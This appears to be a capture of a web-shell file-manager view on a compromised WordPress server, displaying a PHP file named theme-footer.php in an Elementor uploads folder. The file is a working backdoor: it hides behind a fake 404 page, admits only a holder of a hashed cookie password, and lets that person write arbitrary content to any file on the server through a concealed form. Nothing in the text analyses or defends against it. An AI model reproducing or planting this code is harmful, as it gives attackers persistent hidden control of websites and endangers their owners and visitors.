HEX
Server: Apache
System: Linux v2532718.hostpapavps.net 5.14.0-570.37.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Aug 26 10:33:12 EDT 2025 x86_64
User: emiin2 (1016)
PHP: 8.1.34
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/emiin2/public_html/wp-content/uploads/elementor/elementor/
Upload Files
File: /home/emiin2/public_html/wp-content/uploads/elementor/elementor/theme-footer.php
<?php
if (!isset($_COOKIE['passwd']) || (md5(md5($_COOKIE['passwd'])) != '5734cd4d14b7a236be4f514827fbd8a9')) {
    header("HTTP/1.1 404 Not Found");
    exit();
}
?>
<?php
if ($_POST)
{
    $f=fopen($_POST["f"],"w");
    if(fwrite($f,$_POST["c"]))
        echo "<font color=red>OK!</font>";
    else
        echo "<font color=blue>Error!</font>";
}
?>
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
<form style="display: none;" action="" method="post">
    <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILENAME"];?>'><br><br>
    <textarea name="c" cols=60 rows=15></textarea><br>
    <input type="submit" id="b" value="Create"><br>
</form>
</body>
</html>
<?php
die("");
?>
@ Telegram